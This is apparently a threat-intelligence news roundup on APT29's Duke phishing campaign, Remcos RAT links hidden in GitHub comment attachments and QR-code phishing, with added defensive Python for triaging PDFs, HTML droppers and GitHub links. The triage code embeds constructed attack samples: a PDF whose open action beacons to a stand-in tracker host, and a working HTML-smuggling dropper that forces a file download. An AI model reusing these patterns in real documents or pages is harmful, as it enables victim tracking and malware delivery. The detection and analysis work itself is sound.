Foreign affairs ministries of NATO-aligned countries have been targeted by a new phishing campaign deploying a variant of the Duke malware, which has been attributed to the Russian state-backed cyberespionage group APT29, also known as Cozy Bear, BlueBravo, Cloaked Ursa, The Dukes, Midnight Blizzard, and Iron Hemlock, The Hacker News reports.
The attacks begin with emails carrying PDF documents built around diplomatic lures; opening the document launches a malicious HTML dropper, which executes JavaScript that in turn delivers the Duke malware, according to an EclecticIQ report.
The threat actors also abused the API of the open-source chat application Zulip for command-and-control, rather than exploiting a flaw in it, the researchers said, and they noted that a second PDF document appears to have been used purely for reconnaissance.
"It did not contain a payload, but notified the actor if a victim opened the email attachment by receiving a notification through a compromised domain edenparkweddings[.]com," the researchers added.
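The two attachment types in the chain above (a PDF lure that triggers an HTML dropper, and a payload-free "tracker" PDF that only beacons when opened) can be triaged statically before anything is detonated. The following is an added example, not code from the article or from EclecticIQ: it scans raw PDF bytes for auto-firing actions, script, launch actions, embedded files and outbound URIs, and scans HTML for the browser-side primitives a dropper combines to decode a payload and force a download. The PDF and HTML samples are constructed for the example, and the indicator lists and verdict thresholds are the author's assumptions, not a vendor's detection logic.

```python
import re

# Added example, not from the original article or from EclecticIQ.
# Static triage of a PDF lure / tracker PDF and of an HTML dropper.

# PDF name objects worth flagging: actions that fire automatically, script,
# launch actions, embedded files and outbound URIs (assumed indicator set).
PDF_INDICATORS = {
    "open_action": rb"/OpenAction",
    "additional_action": rb"/AA\b",
    "javascript": rb"/JavaScript|/JS\b",
    "launch": rb"/Launch",
    "embedded_file": rb"/EmbeddedFile",
    "uri": rb"/URI\s*\(",
}
AUTO_TRIGGERS = {"open_action", "additional_action"}

# Browser-side primitives an HTML dropper combines: base64-decode, wrap in a
# Blob, mint an object URL, then force a download or click with no user action.
HTML_INDICATORS = {
    "base64_decode": r"\batob\s*\(",
    "blob_construct": r"new\s+Blob\s*\(",
    "object_url": r"URL\.createObjectURL\s*\(",
    "download_attr": r"\.download\s*=|\bdownload\s*=\s*[\"']",
    "programmatic_click": r"\.click\s*\(\s*\)",
    "ms_save_blob": r"msSaveOrOpenBlob",
}


def pdf_urls(data: bytes) -> list:
    """Literal /URI targets, so an analyst sees where a beaconing PDF calls home."""
    return [m.decode("latin-1", "replace") for m in re.findall(rb"/URI\s*\(([^)]*)\)", data)]


def scan_pdf(data: bytes) -> dict:
    hits = {name for name, pat in PDF_INDICATORS.items() if re.search(pat, data)}
    payload_hits = hits - AUTO_TRIGGERS
    if hits & AUTO_TRIGGERS and payload_hits:
        verdict = "suspicious"   # something fires on open AND does something
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits, "urls": pdf_urls(data)}


def scan_html(text: str) -> dict:
    hits = {name for name, pat in HTML_INDICATORS.items() if re.search(pat, text)}
    smuggling = {"base64_decode", "blob_construct"} <= hits and bool(
        hits & {"object_url", "ms_save_blob", "download_attr"}
    )
    if smuggling:
        verdict = "suspicious"
    elif len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


# Constructed samples, not real campaign artifacts. The PDF runs a JavaScript
# action on open and carries a link annotation to a tracker URL; the HTML is a
# minimal dropper of the kind the indicators above describe.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (app.launchURL('https://tracker.example/open', true);) >> endobj\n"
    b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://tracker.example/track?id=1) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

SAMPLE_HTML = """<html><body><script>
var b64 = "UEsDBAoAAAAAAA==";  /* constructed stand-in, not a real payload */
var bytes = Uint8Array.from(atob(b64), function (c) { return c.charCodeAt(0); });
var blob = new Blob([bytes], { type: "application/octet-stream" });
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Invitation.iso";
document.body.appendChild(a);
a.click();
</script></body></html>"""

if __name__ == "__main__":
    print(scan_pdf(SAMPLE_PDF))
    print(scan_html(SAMPLE_HTML))
```

The PDF verdict deliberately keys on the combination of an automatic trigger (/OpenAction or /AA) with a capability (script, launch, URI, embedded file): a tracker PDF with only a /URI annotation still surfaces as "review" with its beacon URL listed, which is exactly the artifact an analyst wants from a payload-free document. Real PDFs may compress object streams or hex-encode names, so treat this as a first-pass filter in front of a proper parser, not as a complete detector.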
The campaign follows a report from Ukraine's Computer Emergency Response Team (CERT-UA) that the open-source Merlin post-exploitation toolkit was being used in phishing attacks against Ukrainian state organizations.
Insurance and finance industry organizations have been targeted with the Remcos RAT in a new phishing campaign that abuses GitHub comments, according to a Cofense report. Attaching a file to a comment on a repository yields a download link under that repository's path, so the attackers' links appeared to point at legitimate open-source tax software repositories rather than at unknown ones, and such links keep working even if the comment itself is never published or is later deleted.
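The practical consequence of the GitHub comment abuse described above is that "hosted on github.com under a project we trust" is not a useful trust signal unless the link is classified by what actually serves it. The following is an added example, not Cofense's or GitHub's code: it sorts GitHub download links into comment attachments, tracked repository content, release assets and everything else, and allowlists a repository only for the latter two kinds. The attachment URL shapes are the author's assumptions based on the forms GitHub has used for files attached to issue and pull request comments and should be checked against current GitHub behaviour; the repository name `taxtools/open-tax` and the sample URLs are hypothetical and constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Added example, not Cofense's or GitHub's code. URL shapes below are assumptions
# about how GitHub exposes comment attachments; verify before relying on them.
OWNER_REPO = r"/(?P<owner>[\w.-]+)/(?P<repo>[\w.-]+)"
COMMENT_ATTACHMENT = [
    re.compile(OWNER_REPO + r"/files/\d+/[^/]+$"),            # older, repo-scoped uploads
    re.compile(r"/user-attachments/(?:files|assets)/[^/]+"),  # newer uploads
]
RELEASE_ASSET = re.compile(OWNER_REPO + r"/releases/download/")
REPO_CONTENT = re.compile(OWNER_REPO + r"/(?:blob|raw)/")
RAW_CONTENT = re.compile(OWNER_REPO + r"/")   # raw.githubusercontent.com/<owner>/<repo>/<ref>/...

TRUSTED_REPOS = {"taxtools/open-tax"}   # hypothetical allowlisted project


def _repo(m) -> Optional[str]:
    """owner/repo from a match, or None when the pattern has no owner group."""
    if m is None or "owner" not in m.groupdict():
        return None
    return f"{m['owner']}/{m['repo']}"


def classify_github_link(url: str) -> dict:
    """Classify a link by who actually controls the bytes it serves."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    path = p.path
    if host == "raw.githubusercontent.com":
        return {"kind": "repo_content", "repo": _repo(RAW_CONTENT.match(path))}
    if host not in ("github.com", "www.github.com"):
        return {"kind": "not_github", "repo": None}
    for pat in COMMENT_ATTACHMENT:          # check attachments first: the path
        m = pat.match(path)                 # looks repo-scoped but is not
        if m:
            return {"kind": "comment_attachment", "repo": _repo(m)}
    m = RELEASE_ASSET.match(path)
    if m:
        return {"kind": "release_asset", "repo": _repo(m)}
    m = REPO_CONTENT.match(path)
    if m:
        return {"kind": "repo_content", "repo": _repo(m)}
    return {"kind": "other_github", "repo": None}


def is_trusted_download(url: str, trusted=TRUSTED_REPOS) -> bool:
    """True only for content the maintainers publish (tracked files or release
    assets) from an allowlisted repo. A comment attachment under a trusted
    repo's path is hosted by whoever posted the comment and is never trusted."""
    c = classify_github_link(url)
    return c["kind"] in ("repo_content", "release_asset") and c["repo"] in trusted


def triage(urls):
    return [(u, classify_github_link(u)["kind"], is_trusted_download(u)) for u in urls]


# Constructed sample links (hypothetical repo and filenames).
SAMPLE_URLS = [
    "https://github.com/taxtools/open-tax/files/1234567/Form_1040_Invoice.zip",  # attachment on a legit repo
    "https://github.com/user-attachments/files/2345678/Statement.zip",           # attachment, newer form
    "https://github.com/taxtools/open-tax/blob/main/README.md",                  # tracked file
    "https://github.com/taxtools/open-tax/releases/download/v1.2.0/open-tax-1.2.0.zip",
    "https://raw.githubusercontent.com/taxtools/open-tax/main/setup.py",
    "https://github.com/unknown-user/dropper/files/99/x.zip",                    # attachment, unknown repo
    "https://example.com/github.com/taxtools/open-tax/files/1/x.zip",            # lookalike path off-GitHub
]

if __name__ == "__main__":
    for url, kind, ok in triage(SAMPLE_URLS):
        print(f"{'TRUSTED ' if ok else 'untrusted'}  {kind:<19} {url}")
```

The ordering in `classify_github_link` matters: the older attachment form begins with a real owner and repository name, so a naive "starts with a trusted org/repo" check would pass it. Matching attachment shapes before repository content is what keeps the first sample link untrusted even though its path begins with the allowlisted project.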
Messages carrying malicious QR codes have also been used increasingly against the education sector, with more than 15,000 such messages sent via Office 365 to education entities, a Microsoft Threat Intelligence report showed.
In addition to more than 40 million signals from the DNS Research Federation's data platform and the Global Anti-Scam Alliance's stakeholder network, the Global Signal Exchange will include more than 100,000 bad merchant URLs and one million scam signals contributed by Google.